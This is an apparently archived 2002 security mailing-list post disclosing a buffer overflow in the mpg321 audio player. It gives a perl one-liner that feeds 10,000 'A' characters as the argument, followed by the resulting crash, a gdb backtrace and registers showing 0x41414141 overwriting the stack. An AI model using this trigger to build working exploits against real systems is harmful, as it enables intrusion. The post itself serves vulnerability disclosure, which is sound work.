I know that there have been older similar bugs, here is a new one that I could find nothing about in the lists. --------------------------------------- os : linux distro : RH 7.1 and others program : mpg321-0.2.2 issues : Possible remote exploitation priority: low-medium author : simonat_private vendor : http://mpg321.sourceforge.net/ ---------------------------------------- High Performance MPEG 1.0/2.0/2.5 Audio Player for Layer 1, 2, and 3. Version 0.59q (2001/Oct/13). Written and copyrights by Joe Drew. Uses code from various people. See 'README' for more! THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK! theory: mpg123 accepts url's and may be used by other suid binaries or services. A buffer condition exists in mpg321 that could allow for remote/unwarrented command execution by means of a specailly formatted URL or other input. mpg321 is not setuid or setgid. fact: mpg123 cores when it is passed the following string: mpg123 `perl -e'print "A" x 10000'` [simon@nova ~testing]$ mpg321 `perl -e'print "A" x 10000'` High Performance MPEG 1.0/2.0/2.5 Audio Player for Layer 1, 2, and 3. Version 0.59q (2001/Oct/13). Written and copyrights by Joe Drew. Uses code from various people. See 'README' for more! THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK! Segmentation fault (core dumped) [simon@nova ~testing]$ <snip>... (gdb) bt #0 getenv (name=0x40173473 "NGUAGE") at ../sysdeps/generic/getenv.c:87 #1 0x40070072 in guess_category_value (category=5, categoryname=0x414c <Error reading address 0x414c: No such process>) at dcigettext.c:1140 #2 0x4006f08f in __dcigettext (domainname=0x4016e51c "libc", msgid1=0x40173b35 "File name too long", msgid2=0x0, plural=0, n=0, category=5) at dcigettext.c:512 #3 0x4006ed7d in __dcgettext (domainname=0x4016e51c "libc", msgid=0x40173b35 "File name too long", category=5) at dcgettext.c:53 #4 0x400ccc38 in __strerror_r (errnum=36, buf=0x4017df40 "", buflen=1024) at ../sysdeps/generic/_strerror.c:68 #5 0x400ccbdb in strerror (errnum=36) at strerror.c:30 #6 0x080497cf in mpg321_error (file=0xbfffd37d 'A' <repeats 200 times>...) at mpg321.c:66 #7 0x08049935 in main (argc=1094795585, argv=0x41414141) at mpg321.c:233 #8 0x41414141 in ?? () Error accessing memory address 0x41414141: No such process. (gdb) info registers eax 0xbfffd260 -1073753504 ecx 0x40173471 1075262577 edx 0x414c 16716 ebx 0x4017c534 1075299636 esp 0xbfffaf00 0xbfffaf00 ebp 0xbfffaf18 0xbfffaf18 esi 0x4017323d 1075262013 edi 0x41414141 1094795585 eip 0x40076a50 0x40076a50 eflags 0x210206 2163206 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x2b 43 gs 0x2b 43 fctrl 0x0 0 fstat 0x0 0 ftag 0x0 0 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0 -l0rt- --------------------------------------------------------------------- Disclaimer: Any resemblance between the above views and those of my employer, my terminal, or the view out my window are purely coincidental. Any resemblance between the above and my own views is non-deterministic. The question of the existence of views in the absence of anyone to hold them is left as an exercise for the reader. The question of the existence of the reader is left as an exercise for the second god coefficient. (A discussion of non-orthogonal, non-integral polytheism is beyond the scope of this article.) ---------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Feb 12 2002 - 15:18:11 PST